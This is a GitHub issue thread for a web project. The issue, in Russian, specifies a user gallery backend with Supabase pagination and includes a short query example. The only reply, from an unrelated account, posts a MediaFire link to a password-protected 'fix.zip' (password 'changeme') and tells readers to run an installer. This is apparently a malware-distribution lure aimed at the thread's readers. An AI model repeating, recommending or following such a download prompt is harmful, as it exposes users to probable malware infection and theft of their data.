### ISSUE TITLE
[Feature]:Gallery for page /@username backend 

### ISSUE THREAD

**Issue by Valyukhov** [glokascom/bibleVis#86]
### Task description:

1. Собрать все картинки конкретного пользователя.
2. Определить является ли он текущим пользователем.
3. Если он текущий пользователь, тогда показывать на картинке иконку редактирования картинки.
4. При удалении картинки ещё не готова модалка - дождаться ветки @Pavel064 с готовой оформленной  модалкой
либо если это быстро - написать самому, можно просто пока  кнопки отмена и ок.
5. Нужна функция, которая показывает - лайкал ли текущий поьзователь или нет. Скорей всего этот параметр нужно уже загружать на сервере и включить в итоговый массив images. !!! Внимание - это  - не в приоритетет, это можн сделать позже. Если будет тянуть время - не делать.
6. Нужно длину массива images показать для страницы - в кол-во картинок.
7. Нужно сделать  дозированную загрузку картинок с базы данных. Т.е. либо предзагрузка всех строк и в функции отдавать по частям.
либо через метод supabase делать это. Сейчас в коде - простой пример бесконечной загрузки и дозированной загрузки по 10 картинок.
8. По-возможности сделать это изолированно от компонента. Не внутри. Скорей всего этот компонент (ImageForGallery or Gallery or both) будет использоваться для разных целей - не только для страницы @username, но и для главной страницы и других. Если это не займет много времени
### Examples and links:

```
const { data: newData, error } = await supabase
      .from('your_table')
      .select('*')
      .limit(10)
      .offset(page * 10);
```
https://supabase.com/docs/reference/javascript/range

### Evaluation criteria:
1.
2.

### Implementation steps:
1.
2.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
